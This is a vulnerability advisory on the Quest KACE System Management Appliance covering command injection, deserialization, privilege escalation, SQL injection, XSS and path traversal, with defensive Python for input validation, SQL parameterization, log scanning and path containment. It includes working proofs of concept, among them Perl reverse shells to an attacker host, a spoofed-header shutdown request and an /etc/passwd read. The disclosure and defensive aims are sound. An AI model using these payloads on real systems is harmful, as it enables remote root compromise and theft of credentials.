**CVSS2:** 10 High (AV:N/AC:L/Au:N/C:C/I:C/A:C): Attack Vector NETWORK, Attack Complexity LOW, Authentication NONE, Confidentiality Impact COMPLETE, Integrity Impact COMPLETE, Availability Impact COMPLETE
**CVSS3:** 8.8 High (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H): Attack Vector NETWORK, Attack Complexity LOW, Privileges Required LOW, User Interaction NONE, Scope UNCHANGED, Confidentiality Impact HIGH, Integrity Impact HIGH, Availability Impact HIGH
**EPSS:** 0.923 High (Percentile 99.0%)
**Title:** Quest KACE System Management Appliance Multiple Vulnerabilities
**Advisory ID:** CORE-2018-0004
**Advisory URL:** <https://www.coresecurity.com/core-labs/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities>
**Date published:** 2018-05-31
**Date of last update:** 2018-05-22
**Vendors contacted:** Quest Software Inc.
**Release mode:** Forced release
**Class:** Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73]
**Impact:** Code execution
**Remotely Exploitable:** Yes
**Locally Exploitable:** Yes
**CVE Name:** CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
From Quest KACE’s website:
“The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization’s systems management needs, from initial deployment to ongoing management and retirement.”
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest’s definition of “responsible disclosure” can be found at <https://support.quest.com/essentials/reporting-security-vulnerability>.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure, to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to give users and organizations enough information to understand the implications of the vulnerabilities for their environment and, most importantly, to prioritize the remediation activities aimed at mitigating risk.
We regret Quest’s posture on disclosure during the whole process (detailed in the Report Timeline section) and the impossibility of agreeing on a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
Other products and versions might be affected too, but they were not tested.
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. The patch can be downloaded at <https://support.quest.com/download-install-detail/6086148>.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7.8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).
[CVE-2018-11138] The ‘/common/download_agent_installer.php’ script is accessible to anonymous users in order to download an agent for a specific platform. This behavior can be abused to execute arbitrary commands on the system.
The script receives the following parameters via the GET method:
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table ‘CLIENT_DISTRIBUTION’ and fetching the contents of the ‘VERSION’ column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table ‘ORGANIZATION’ and the column ‘ID’.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
- platform = windows
- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c
- orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};';
- version = 8.0.152 (last agent version available for windows)
The following proof of concept executes a reverse shell:
```
GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1
Host: Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```

```
$ nc -lvp 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050)
sh: can't access tty; job control turned off
$ id
uid=80(www) gid=80(www) groups=80(www)
```
[CVE-2018-11139] The ‘/common/ajax_email_connection_test.php’ script, used to test the configured SMTP server, is accessible to any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input ‘TEST_SERVER’, sent to the script via the POST method.
The following proof of concept executes a reverse shell:
```
POST /common/ajax_email_connection_test.php HTTP/1.1
Host: [ServerIP]
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 416
Cookie: [Cookie]
Connection: close

TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@ eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@ eaea.com&ACTION=TEST_CONNECTION_SMTP
```

```
$ nc -lvp 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050)
sh: can't access tty; job control turned off
$ id
uid=80(www) gid=80(www) groups=80(www)
```
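Issues 7.1 and 7.2 share one root cause: a request parameter (‘orgid’, ‘version’, ‘TEST_SERVER’) is spliced into a command line that a shell parses, so a ‘;’ ends the intended command and starts another one. The following Python is an added illustration written for this advisory, not the appliance's PHP code or anything from Quest or Core Security. It puts the vulnerable string-building pattern beside a hardened handler that checks each parameter against the exact shape it must have and hands values to the program as separate argv entries with no shell in between. The function names, the platform allowlist and the program names ‘build_agent_installer’ and ‘smtp_probe’ are assumptions made for the example.

```python
import re
import subprocess

ALLOWED_PLATFORMS = {"windows", "mac", "linux"}            # assumed allowlist
ORGID_RE = re.compile(r"[0-9]{1,9}")                        # a plain integer, nothing else
VERSION_RE = re.compile(r"[0-9]+\.[0-9]+\.[0-9]+")           # e.g. 8.0.152
HOSTNAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?")


def unsafe_installer_command(platform, orgid, version):
    """Vulnerable pattern: values spliced into one string that a shell will parse.
    With orgid = "1#;perl -e '...'" the shell sees the ';' and runs a second command.
    (Program name is hypothetical; nothing here executes it.)"""
    return f"build_agent_installer --platform {platform} --org {orgid} --version {version}"


def validate_installer_params(params):
    """Hardened: every parameter must match its expected shape exactly, otherwise the
    request is refused before any query or command is built."""
    platform = params.get("platform", "")
    orgid = params.get("orgid", "")
    version = params.get("version", "")
    if platform not in ALLOWED_PLATFORMS:
        raise ValueError("platform not in allowlist")
    if not ORGID_RE.fullmatch(orgid):
        raise ValueError("orgid is not a plain integer")
    if not VERSION_RE.fullmatch(version):
        raise ValueError("version is not a dotted version number")
    return platform, int(orgid), version


def safe_installer_argv(params):
    """Hardened: the program receives its arguments as a list. No shell is involved,
    so each value is exactly one argv entry whatever characters it contains."""
    platform, orgid, version = validate_installer_params(params)
    return ["build_agent_installer", "--platform", platform,
            "--org", str(orgid), "--version", version]


def safe_smtp_probe_argv(test_server, test_port):
    """Same treatment for the SMTP test endpoint (7.2): the server must look like a
    hostname, the port must be an integer in range, and both travel as argv entries."""
    if not HOSTNAME_RE.fullmatch(test_server):
        raise ValueError("TEST_SERVER is not a hostname")
    if not re.fullmatch(r"[0-9]{1,5}", test_port) or not 0 < int(test_port) < 65536:
        raise ValueError("TEST_PORT is not a port number")
    return ["smtp_probe", "--server", test_server, "--port", test_port]


def run_argv(argv):
    """How a hardened argv would be executed: shell=False, so metacharacters inside
    any argument are never interpreted. Not called by the checks below."""
    return subprocess.run(argv, shell=False, capture_output=True, text=True, check=False)


def accepts(fn, *args):
    """True if the validator accepts the input, False if it refuses it."""
    try:
        fn(*args)
        return True
    except ValueError:
        return False
```

The point of the argv form is that it removes the shell from the picture entirely; the allowlist and regular expressions are a second, independent layer that also rejects the SQL injection payloads from 7.7 long before they reach a database.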
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script ‘/adminui/error_details.php’ to inject arbitrary PHP objects.
To exploit this issue, the ‘ERROR_MESSAGES’ parameter must be an array that meets some specific conditions.
[CVE-2018-11134] In order to perform actions that require higher privileges, the application relies on a message queue manager that runs with root privileges and only allows a set of commands.
One of the available commands allows changing any user’s password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the ‘kace_support’ account, which comes disabled by default but has full sudo privileges.
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
A command injection vulnerability exists within this message queue which allows us to append arbitrary commands that will be run as root.
[CVE-2018-11142] The ‘systemui/settings_network.php’ and ‘systemui/settings_patching.php’ scripts are accessible only from localhost. This restriction can be bypassed by modifying the ‘Host’ and ‘X-Forwarded-For’ HTTP headers.
The following proof of concept abuses this vulnerability to shut down the server as an anonymous user:
```
POST /systemui/settings_network.php HTTP/1.1
Host: localhost
X-Forwarded-For: ::1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ServerIp]/systemui/settings_network.php
Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129
Content-Length: 3418
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------5642543667001619951434940129
Content-Disposition: form-data; name="CSRF_TOKEN"

-----------------------------5642543667001619951434940129
Content-Disposition: form-data; name="$shutdown"

DoIt!
Content-Disposition: form-data; name="save"

Save
-----------------------------5642543667001619951434940129--
```
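What makes 7.6 exploitable is that the "only from localhost" check reads values the client controls, the ‘Host’ and ‘X-Forwarded-For’ headers, instead of the address the TCP connection actually came from. The following Python is an added illustration for this advisory, not the appliance's code: the weak check beside one that decides purely on the transport-level peer address (what a web server exposes as REMOTE_ADDR) and ignores request headers. Function names and the example addresses are assumptions.

```python
import ipaddress


def _is_loopback(addr):
    """True only for a syntactically valid loopback address (127.0.0.0/8 or ::1)."""
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def weak_is_local(remote_addr, headers):
    """The flawed pattern: trusting client-supplied headers. A remote client that
    sends 'Host: localhost' and 'X-Forwarded-For: ::1' passes this check even though
    remote_addr says otherwise (remote_addr is not even consulted)."""
    host = headers.get("Host", "").split(":")[0].lower()
    forwarded = headers.get("X-Forwarded-For", "").split(",")[0].strip()
    return host in ("localhost", "127.0.0.1", "::1") or _is_loopback(forwarded)


def strict_is_local(remote_addr, headers=None):
    """Hardened check: only the peer address of the connection counts. The headers
    parameter exists just to make explicit that it is deliberately ignored."""
    return _is_loopback(remote_addr)


def authorize_system_page(remote_addr, headers):
    """Gate for pages such as settings_network.php: refuse unless the peer is loopback.
    Returns (status, message) like a minimal HTTP handler would."""
    if not strict_is_local(remote_addr, headers):
        return 403, "Forbidden: this page is only served to local connections"
    return 200, "OK"
```

If a reverse proxy sits in front of the application, the only safe variant is to honour ‘X-Forwarded-For’ exclusively when remote_addr is that proxy's own address; the header must never be believed on its own.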
[CVE-2018-11136] The ‘orgID’ parameter received by the ‘/common/download_agent_installer.php’ script is not sanitized, leading to SQL injection, specifically a blind, time-based one.
The following proof of concept induces a time delay:
http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152
[CVE-2018-11140] The ‘reportID’ parameter received by the ‘/common/run_report.php’ script is not sanitized, leading to SQL injection, specifically an error-based one.
The following proof of concept retrieves the current database name:
```
POST /common/run_report.php HTTP/1.1
Content-Length: 161
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Host: [ServerIP]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: close
Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Cookie: [Cookie]

date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf
```

```
HTTP/1.1 200 OK
Date: Thu, 08 Feb 2018 21:50:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS
X-KACE-Appliance: K1000
X-KACE-Host: [ServerIP]
X-KACE-Version: 8.0.318
X-KBOX-WebServer: [ServerIP]
X-KBOX-Version: 8.0.318
X-KACE-WebServer: [ServerIP]
X-UA-Compatible: IE=9,EDGE
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Content-Length: 3548
Connection: close
Content-Type: text/html; charset=utf-8

[...SNIPPED...]
<script type="text/javascript" src="/common/js/vendor/html5.js?BUILD=318" /></script>
<![endif]--><title>Report Queued: qppjqORG1qjpqq</title><meta http-equiv='refresh'
[...SNIPPED...]
```
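Both SQL injections (7.7 via ‘orgid’, 7.8 via ‘reportId’) involve integer identifiers that were spliced into query text, which is why a comment marker or a UNION clause can change what the statement does. The following Python is an added example written for this advisory against an in-memory SQLite stand-in; it is not the appliance's code and the appliance does not use SQLite. Only the names CLIENT_DISTRIBUTION, VERSION, ORGANIZATION and ID come from the advisory; the rest of the schema, the REPORT table and the rows are constructed. It shows the string-built query beside a parameterized one, with the integer type check that belongs in front of both lookups.

```python
import re
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the appliance database (schema is assumed)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE ORGANIZATION (ID INTEGER PRIMARY KEY, NAME TEXT);
        CREATE TABLE CLIENT_DISTRIBUTION (ORG_ID INTEGER, PLATFORM TEXT, VERSION TEXT);
        CREATE TABLE REPORT (ID INTEGER PRIMARY KEY, NAME TEXT);
        INSERT INTO ORGANIZATION VALUES (1, 'Default');
        INSERT INTO CLIENT_DISTRIBUTION VALUES (1, 'windows', '8.0.152');
        INSERT INTO REPORT VALUES (7, 'Patch compliance');
    """)
    return db


def unsafe_query_text(orgid):
    """Vulnerable pattern: the raw parameter becomes part of the SQL text, so a value
    such as '1 AND SLEEP(10)#' is executed as SQL rather than compared as data.
    Returned as a string only; nothing here runs it."""
    return f"SELECT VERSION FROM CLIENT_DISTRIBUTION WHERE ORG_ID = {orgid}"


def parse_id(value):
    """Identifiers are integers: refuse anything else before it gets near the database."""
    if not re.fullmatch(r"[0-9]{1,9}", value):
        raise ValueError("identifier must be a plain integer")
    return int(value)


def agent_version(db, orgid, platform):
    """Parameterized lookup: the driver binds orgid as a value, never as SQL text."""
    row = db.execute(
        "SELECT VERSION FROM CLIENT_DISTRIBUTION WHERE ORG_ID = ? AND PLATFORM = ?",
        (parse_id(orgid), platform),
    ).fetchone()
    return row[0] if row else None


def report_name(db, report_id):
    """Same pattern for the report lookup behind run_report.php."""
    row = db.execute("SELECT NAME FROM REPORT WHERE ID = ?", (parse_id(report_id),)).fetchone()
    return row[0] if row else None


def lookup_or_none(fn, db, value, *extra):
    """Wrapper for the checks: rejected input yields None and never reaches the database."""
    try:
        return fn(db, value, *extra)
    except ValueError:
        return None
```

The type check and the bound parameter are independent defences: even if a non-integer string did reach the parameterized statement, it would be compared as a literal value against an integer column and match nothing.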
[CVE-2018-11133] The ‘fmt’ parameter of the ‘/common/run_cross_report.php’ script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952
[CVE-2018-11137] The ‘checksum’ parameter of the ‘/common/download_attachment.php’ script can be abused to read arbitrary files with ‘www’ privileges. The following proof of concept reads the ‘/etc/passwd’ file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with ‘www’ privileges, such as all the files located in ‘/kbox/bin/koneas/keys/’ and ‘/kbox/kboxwww/include/globals.inc’, which contain plaintext passwords.
The following proof of concept demonstrates the vulnerability:
```
GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1
Host: [ServerIP]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: [Cookie]
Connection: close
Upgrade-Insecure-Requests: 1
```

```
HTTP/1.1 200 OK
Date: Thu, 18 Jan 2018 17:18:19 GMT
Server: Apache
Cache-Control: must-revalidate, post-check=0, pre-check=0
Expires: -1
Pragma: public
Content-Disposition: attachment; filename=""
Content-Transfer-Encoding: Binary
Content-Description: K1000 attachment
Content-Length: 2400
Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS
X-KACE-Appliance: K1000
X-KACE-Host: k10000.
X-KACE-Version: 8.0.318
X-KBOX-WebServer: k10000.
X-KBOX-Version: 8.0.318
X-KACE-WebServer: k10000.
X-UA-Compatible: IE=9,EDGE
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Connection: close
Content-Type: application/octet-stream

# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
[...SNIPPED...]
```
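Several of the proofs of concept on this page (7.1, 7.7, 7.9 and 7.10) travel in the query string of a GET request, so they leave a trace in the web server's access log. The following Python is an added example for this advisory, not a Quest or Core Security tool: it parses constructed Apache-style log lines and flags requests to the affected scripts whose parameters do not have the shape those scripts expect (an integer organisation id, a dotted version, a short format name, a hex checksum). The sample lines, the expected-shape rules and the assumption that ‘checksum’ is always a hex digest are this example's own; a deployment would tune them against its real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log in Apache combined format; addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [31/May/2018:10:01:02 +0000] "GET /common/download_agent_installer.php?platform=windows&serv=abc&orgid=1&version=8.0.152 HTTP/1.1" 200 512 "-" "KACE-Agent"
198.51.100.9 - - [31/May/2018:10:02:15 +0000] "GET /common/download_agent_installer.php?platform=windows&serv=abc&orgid=1%23%3bperl+-e+'x'%3b&version=8.0.152 HTTP/1.1" 200 0 "-" "curl/7.58"
198.51.100.9 - - [31/May/2018:10:02:40 +0000] "GET /common/download_agent_installer.php?platform=windows&serv=abc&orgid=1+AND+SLEEP(10)%23;&version=8.0.152 HTTP/1.1" 200 0 "-" "curl/7.58"
203.0.113.8 - - [31/May/2018:10:03:01 +0000] "GET /common/run_cross_report.php?uniqueId=1&id=585&org=1&fmt=xls HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [31/May/2018:10:03:30 +0000] "GET /common/run_cross_report.php?uniqueId=1&id=585&org=1&fmt=xls')%3balert(1)%2f%2f HTTP/1.1" 200 2048 "-" "curl/7.58"
198.51.100.9 - - [31/May/2018:10:04:00 +0000] "GET /common/download_attachment.php?checksum=/../../../../etc/passwd&filename= HTTP/1.1" 200 2400 "-" "curl/7.58"
203.0.113.9 - - [31/May/2018:10:05:00 +0000] "GET /common/download_attachment.php?checksum=9f86d081884c7d659a2feaa0c55ad015&filename=report.pdf HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

INT_RE = re.compile(r"[0-9]{1,9}")
VERSION_RE = re.compile(r"[0-9]+\.[0-9]+\.[0-9]+")
FORMAT_RE = re.compile(r"[a-z]{1,10}")
CHECKSUM_RE = re.compile(r"[0-9a-fA-F]{16,128}")    # assumed: a hex digest, never a path

# Per-script expectations: parameter name -> regex the whole (decoded) value must match.
EXPECTED = {
    "/common/download_agent_installer.php": {"orgid": INT_RE, "version": VERSION_RE},
    "/common/run_cross_report.php": {"fmt": FORMAT_RE, "id": INT_RE, "org": INT_RE},
    "/common/download_attachment.php": {"checksum": CHECKSUM_RE},
}


def parse_line(line):
    """Split one access-log line into ip, timestamp, path and decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    query = parse_qs(parts.query, keep_blank_values=True)   # percent-decodes values
    params = {name: values[0] for name, values in query.items()}
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path, "params": params}


def findings_for(entry):
    """Reasons why this request resembles one of the advisory's payloads (empty if none)."""
    rules = EXPECTED.get(entry["path"])
    if not rules:
        return []
    reasons = []
    for name, rx in rules.items():
        value = entry["params"].get(name)
        if value is not None and not rx.fullmatch(value):
            reasons.append(f"{name} does not match expected shape: {value[:40]!r}")
    return reasons


def scan(log_text):
    """Return a list of (ip, path, reason) for every suspicious request in the log."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry:
            for reason in findings_for(entry):
                hits.append((entry["ip"], entry["path"], reason))
    return hits


def count_by_ip(hits):
    """Aggregate hits per source address, the usual pivot for an alert."""
    counts = {}
    for ip, _, _ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts
```

Positive-shape rules of this kind age better than signature matching on ‘SLEEP’ or ‘perl’: any encoding or variation of the payload still fails to look like an integer. The POST-based vectors (7.2, 7.8, 7.11) need request-body logging or a WAF in front of the appliance, since the access log does not carry the body.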
[CVE-2018-11141] The ‘IMAGES_JSON’ and ‘attachments_to_remove[]’ parameters of the ‘/adminui/advisory.php’ script can be abused to write and delete files, respectively. The following proof of concept creates a file located at ‘/kbox/kboxwww/resources/TestWrite’ with the content ‘Sarasa’ (base64 encoded). Files can be written to any location where the ‘www’ user has write permissions.
File deletion could be abused to delete ‘/kbox/kboxwww/systemui/reports/setup_completed.log’ file. This file’s existence defines if the appliance setup wizard is shown or not.
The following proof of concept demonstrates the vulnerability:
```
POST /adminui/advisory.php?ID=10 HTTP/1.1
Host: [ServerIP]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ServerIP]/adminui/advisory.php?ID=10
Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100
Content-Length: 1705
Cookie: [Cookie]
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------2671551246366368501556269100
Content-Disposition: form-data; name="CSRF_TOKEN"

99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e
-----------------------------2671551246366368501556269100
Content-Disposition: form-data; name="IMAGES_JSON"

{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="}
-----------------------------2671551246366368501556269100
Content-Disposition: form-data; name="FARRAY[ID]"
[...SNIPPED...]
```
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
```
[root@k10000 /kbox/kboxwww/resources]# ls -lha
total 32
drwxr-xr-x   2 www   wheel   512B Feb  9 20:40 .
drwxr-xr-x  23 root  wheel   512B Nov 14 18:29 ..
-rw-r--r--   1 www   wheel    11B Feb  9 20:40 TestWrite
```
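The two traversal issues (7.10, a read through ‘checksum’; 7.11, a write and a delete through the keys of ‘IMAGES_JSON’ and ‘attachments_to_remove[]’) come from letting a request parameter name a filesystem path. The following Python is an added example for this advisory, not the appliance's code: a resolver that anchors every name under a fixed base directory, refuses names that are not of the expected shape at all, and independently rejects any path that still escapes the base after ‘..’ and symlink resolution. The temporary directory layout, the digest value and the file names are constructed; the payloads it rejects are the ones shown in the proofs of concept above.

```python
import re
import tempfile
from pathlib import Path

CHECKSUM_RE = re.compile(r"[0-9a-f]{32,128}")     # assumed: attachments are stored under a hex digest
NAME_RE = re.compile(r"[A-Za-z0-9._-]{1,128}")    # assumed: plain file names only, no separators


class PathRejected(ValueError):
    """Raised for any name that must not reach the filesystem layer."""


def resolve_under(base, user_value, shape):
    """Return the real path of user_value inside base, or raise PathRejected.
    Two independent defences: the name must match `shape` (so '/', '..' and NUL never
    appear), and the fully resolved path must still lie inside the resolved base."""
    if not shape.fullmatch(user_value):
        raise PathRejected(f"unexpected name: {user_value[:40]!r}")
    base_real = Path(base).resolve()
    candidate = (base_real / user_value).resolve()
    if candidate != base_real and base_real not in candidate.parents:
        raise PathRejected("path escapes the base directory")
    return candidate


def read_attachment(base, checksum):
    """Read side (7.10): the checksum selects a stored file, it never names a path."""
    return resolve_under(base, checksum, CHECKSUM_RE).read_bytes()


def write_image(base, name, data):
    """Write side (7.11): same containment before any file is created."""
    path = resolve_under(base, name, NAME_RE)
    path.write_bytes(data)
    return path


def remove_attachment(base, name):
    """Delete side (7.11): returns True if a contained regular file was removed."""
    path = resolve_under(base, name, NAME_RE)
    if path.is_file():
        path.unlink()
        return True
    return False


def demo():
    """Constructed layout in a temporary directory: one stored attachment plus a file
    outside the base that the traversal payloads try to reach. Returns a result map."""
    root = Path(tempfile.mkdtemp())
    base = root / "attachments"
    base.mkdir()
    digest = "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"  # constructed
    (base / digest).write_bytes(b"stored attachment")
    (root / "secret").write_bytes(b"outside the base")
    results = {"legit_read": read_attachment(base, digest)}
    for payload in ("/../../../../../../../../../../../etc/passwd", "../secret", "..", "/etc/passwd"):
        try:
            read_attachment(base, payload)
            results[payload] = "ALLOWED"
        except PathRejected:
            results[payload] = "rejected"
    try:
        write_image(base, "/../../../resources/TestWrite", b"x")
        results["traversal_write"] = "ALLOWED"
    except PathRejected:
        results["traversal_write"] = "rejected"
    # Containment alone, with the shape check switched off, still stops the escape.
    try:
        resolve_under(base, "../secret", re.compile(r".*"))
        results["containment_alone"] = "ALLOWED"
    except PathRejected:
        results["containment_alone"] = "rejected"
    results["legit_write"] = write_image(base, "TestWrite", b"x").name
    results["legit_delete"] = remove_attachment(base, "TestWrite")
    return results
```

Keeping the shape check and the containment check separate matters: the former gives a clear error for obviously malformed input, while the latter also covers symlinks inside the base directory that point elsewhere, which no regular expression on the name can see.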
[1] <https://www.quest.com/products/kace-systems-management-appliance/>
